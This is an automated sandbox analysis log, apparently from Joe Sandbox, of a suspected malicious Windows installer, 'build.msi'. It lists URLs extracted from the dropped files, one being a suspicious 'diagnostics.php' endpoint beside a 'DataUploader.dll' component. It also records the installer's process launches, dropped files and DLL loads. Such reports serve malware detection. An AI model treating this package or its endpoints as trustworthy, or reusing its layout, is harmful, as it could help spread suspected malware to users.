    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/258)).
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/342)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/365)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/372)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/420)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/422)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/442)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/453)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/456)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/465)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/480)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/487)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/501)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/503)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/512)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/516)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/519)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/520)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/537)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/543)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/544)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/skywind3000/z.lua)
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/blob/master/AUTHORS
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/blob/master/AUTHORShttps://github.com/sumatrapdfreade
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/blob/master/TRANSLATORS
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/%s)
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/646d1feddcc80b3b51072c5b27a1446487904175
    Source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/646d1feddcc80b3b51072c5b27a1446487904175)
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions/2316
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussionsSumatraPDF
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://myactivity.google.com/
    Source: el.pak.4.dr, bg.pak.4.drString found in binary or memory: https://passwords.google.com
    Source: fr.pak.4.drString found in binary or memory: https://passwords.google.comCompte
    Source: es.pak.4.drString found in binary or memory: https://passwords.google.comcuenta
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://policies.google.com/
    Source: rufus-4.6p.exe.4.drString found in binary or memory: https://rufus.ie
    Source: rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: https://sectigo.com/CPS0
    Source: build.msiString found in binary or memory: https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://sumatra-website.onrender.com/update-check-rel.txt
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://sumatra-website.onrender.com/update-check-rel.txtInstaller64LatestInstaller32InstallerArm64P
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
    Source: el.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
    Source: es.pak.4.drString found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.deepl.com/translator#-/$
    Source: build.msiString found in binary or memory: https://www.digicert.com/CPS0
    Source: rufus-4.6p.exe.4.drString found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.htmlD
    Source: el.pak.4.dr, bg.pak.4.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
    Source: fr.pak.4.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
    Source: es.pak.4.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlAy&udaGestionado
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/URLUpdateInfohttps://www.sumatrapdfreader.org/docs/Version-history.
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerel
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2
    Source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsa
    Source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Contribute-translation
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Corrupted-installation
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Installer-cmd-line-arguments
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Keyboard-shortcuts
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Keyboard-shortcutssumatrapdfrestrict.inihttps://www.sumatrapdf
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Submit-crash-report.html
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Submit-crash-report.htmlShowCrashHandlerMessage:
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/docs/Version-history.html
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/download-free-pdf-viewer
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/download-free-pdf-viewer-------------
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/manual
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/manualArialwebsiteArial
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-5-1.html
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-5-1.html8.33
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txt
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txtnotifUpdateCheckInProgress
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownHTTPS traffic detected: 104.21.64.101:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\605253.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6389.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6501.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6560.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI659F.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65EE.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E8B.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI717A.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\605256.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\605256.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6389.tmpJump to behavior
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll 882063948D675EE41B5AE68DB3E84879350EC81CF88D15B9BABF2FA08E332863
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe E2CA3EC168AE9C0B4115CD4FE220145EA9B2DC4B6FC79D765E91F415B34D00DE
    Source: rufus-4.6p.exe.4.drStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM)
    Source: TPClntloc.dll.4.drStatic PE information: No import functions for PE file found
    Source: TPClntdeu.dll.4.drStatic PE information: No import functions for PE file found
    Source: TPClntjpn.dll.4.drStatic PE information: No import functions for PE file found
    Source: build.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenameDataUploader.dllF vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenameucrtbase.dllj% vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenamevcruntime140.dllT vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenamemsvcp140.dllT vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenameMicrosoft.Web.WebView2.Core.dll vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenameMicrosoft.UI.Xaml.dllD vs build.msi
    Source: build.msiBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs build.msi
    Source: rufus-4.6p.exe.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9995281382631407
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Context.cpp%s:%d WARNING: UNSUPPORTED: VkIndexType %d
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Context.cpp
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp%s:%d WARNING: UNSUPPORTED: VkImageViewType %d
    Source: vk_swiftshader.dll.4.drBinary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp%s:%d WARNING: UNSUPPORTED: Blitter source format %d
    Source: vk_swiftshader.dll.4.drBinary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp%s:%d WARNING: UNSUPPORTED: polygon mode: %d
    Source: vk_swiftshader.dll.4.drBinary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp
    Source: clink_dll_x86.dll.4.drBinary or memory string: ...Slnt
    Source: classification engineClassification label: mal72.winMSI@6/117@1/1
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML723F.tmpJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeMutant created: NULL
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF13CF08A5848E8701.TMPJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
    Source: build.msiVirustotal: Detection: 31%
    Source: build.msiReversingLabs: Detection: 25%
    Source: launcher.exeString found in binary or memory: sv:Kunde inte hitta SumatraPDF-installation. ta:PDF . th:
    Source: launcher.exeString found in binary or memory: 64-.\n\n 64- tl:Nag-i-install ka n
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68EJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
